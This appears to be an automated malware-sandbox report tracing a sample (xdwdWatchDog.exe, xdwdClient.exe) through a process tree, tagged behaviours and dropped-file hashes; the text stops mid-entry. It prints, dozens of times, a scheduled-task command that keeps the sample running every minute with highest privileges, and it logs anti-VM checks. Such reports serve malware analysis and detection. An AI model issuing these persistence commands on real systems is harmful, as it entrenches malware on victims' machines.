                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5080
                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                PID:1992
                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:3092
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                  PID:732
                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1072
                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                    PID:1036
                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:4784
                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                      PID:2240
                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:6200
                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:6240
                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:6524
                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:6568
                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:6696
                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                            PID:6804
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:6844
                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                              PID:3644
                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:7080
                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:1472
                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2952
                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                  PID:6504
                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:3828
                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3968
                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:7048
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                      PID:4812
                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6548
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                        PID:6744
                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5512
                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                          PID:1756
                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6528
                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                            PID:6772
                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4196
                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                              PID:6888
                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6992
                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                PID:6792
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\Sub\xdwdWatchDog.exe
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1012
                                                                                                                                                                                                                              • C:\Windows\Sub\xdwdWatchDog.exe
                                                                                                                                                                                                                                C:\Windows\Sub\xdwdWatchDog.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Looks for VirtualBox Guest Additions in registry
                                                                                                                                                                                                                                • Looks for VMWare Tools registry key
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Maps connected drives based on registry
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:3952
                                                                                                                                                                                                                                • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5500
                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                      PID:5596
                                                                                                                                                                                                                                  • C:\Windows\Sub\xdwdClient.exe
                                                                                                                                                                                                                                    "C:\Windows\Sub\xdwdClient.exe"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Looks for VirtualBox Guest Additions in registry
                                                                                                                                                                                                                                    • Looks for VMWare Tools registry key
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Maps connected drives based on registry
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:4744
                                                                                                                                                                                                                                    • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:3160
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                          PID:1360
                                                                                                                                                                                                                                      • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:1828
                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                            PID:4688
                                                                                                                                                                                                                                        • C:\Windows\system32\CMD.exe
                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:4976
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:2024
                                                                                                                                                                                                                                    • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                      C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:4812
                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BDESVC
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                                    • C:\Windows\System32\BdeUISrv.exe
                                                                                                                                                                                                                                      C:\Windows\System32\BdeUISrv.exe -Embedding
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:1540
                                                                                                                                                                                                                                    • C:\Windows\System32\FveNotify.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\FveNotify.exe" \\?\Volume{4b4f6944-0000-0000-0000-d08302000000}\
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:3272
                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:5596
                                                                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                        PID:5388
                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1992 -prefsLen 27100 -prefMapHandle 1996 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {fa6f3412-6dac-49a9-927b-4a9344195aa7} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:5212
                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2444 -prefsLen 27136 -prefMapHandle 2448 -prefMapSize 270279 -ipcHandle 2456 -initialChannelId {40c457b3-7eba-4793-afff-a1503f4bc007} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:3636
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3792 -prefsLen 27277 -prefMapHandle 3796 -prefMapSize 270279 -jsInitHandle 3800 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3808 -initialChannelId {62eb48cf-db43-4d52-a58c-175d6b85369a} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:4016
                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3952 -prefsLen 27277 -prefMapHandle 3956 -prefMapSize 270279 -ipcHandle 4056 -initialChannelId {504f99ca-c604-43ef-bef8-da05fe6e1d12} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:3004
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1040 -prefsLen 34776 -prefMapHandle 3380 -prefMapSize 270279 -jsInitHandle 884 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1036 -initialChannelId {982b5445-ecfc-459d-b570-0db1cdecc520} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:5024
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4984 -prefsLen 35013 -prefMapHandle 4988 -prefMapSize 270279 -ipcHandle 4996 -initialChannelId {8a0cd3c8-b5a0-483c-bb81-ff6c8f38fdee} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:6920
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4764 -prefsLen 32952 -prefMapHandle 4780 -prefMapSize 270279 -jsInitHandle 4792 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5228 -initialChannelId {6eb1aecc-b075-489c-a07c-759a0781297b} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:6800
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2840 -prefsLen 32952 -prefMapHandle 2964 -prefMapSize 270279 -jsInitHandle 3256 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3356 -initialChannelId {7aa7ee00-736c-4e01-a4e2-974d11458626} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:6320
                                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5568 -prefsLen 32952 -prefMapHandle 5572 -prefMapSize 270279 -jsInitHandle 5576 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5584 -initialChannelId {e4b36c49-c6ab-4810-90a4-22959acceb0f} -parentPid 5388 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5388" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                              PID:6812
                                                                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:5484
                                                                                                                                                                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x45c 0x2f4
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:4500

                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\4f83669d-9284-4a27-bd9a-033556b9600b.tmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          55KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2d4399d1a3ba2c3aadb5a31f55306ef5

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          49e3193f4bfd120bf898e937859c220edc0228d4

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          40830c160be1e11913e08981a95453a34cbef57153d68af2ea5325520eb84d6a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          9907aa7ca46a154fabc655a5d4b92e5e531006dfe74142170810bbc9ad9b1a5f70808d6470324ba303c1498d09249b9247bd5de4f5815037fc71be818e94c09c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          7da492a02c29529dc0ca538b502e3379

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          cee6a1b81936f6a20f1c9c4f35c29394338ff54b

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          553164a83cb91c4905a86373c61bd899bc1007e7719791878bb95290f1f27f36

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          3a1aaff3da507ce35c4e06ff9fd2516c65780849b24fab33417da2e799e20bda3594e5f2f32b1326dd1d3da560c76dbff1f626c147e99c7a990fe09ab0a2e89c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          7a1f27120006b9d40c8e06e1e06f7db1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6c384cdba5a61aea6e4c9a4c58aaa561a276a2b0

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          75cc38eb1e84977dd8c157a851941dfac6d4334c66e86057512802d5acc0529d

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          827bf560240b3e2d51a186dc32bc67c4ce31c13ff511d6bd84f03ec6187d211439f0cade5490e2c601fd26cf79af746a381357ed7e19eef9147fabc04db4a240

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          774e26eeaa61d4bd27b77ef6d3ce89cd

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d7b552021ea0e0c95f58263093db15711469dc9a

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          d6f8a7077e2fa66cb20b5ebecfe33aff25a489afef2b73b61e2fdee5fe60072a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          63794ee9f363701e148e48d75b35ca9e735c4d3d9fa2816481d7bf5bee2119afb06bd2ec908a158ae488f90c0400f840c0782dcca63d029b236a2dc0c092b7d4

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          44KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f47c17c999b11a654bbb1e3833520487

                                                                                                                                                                                                                                          SHA1

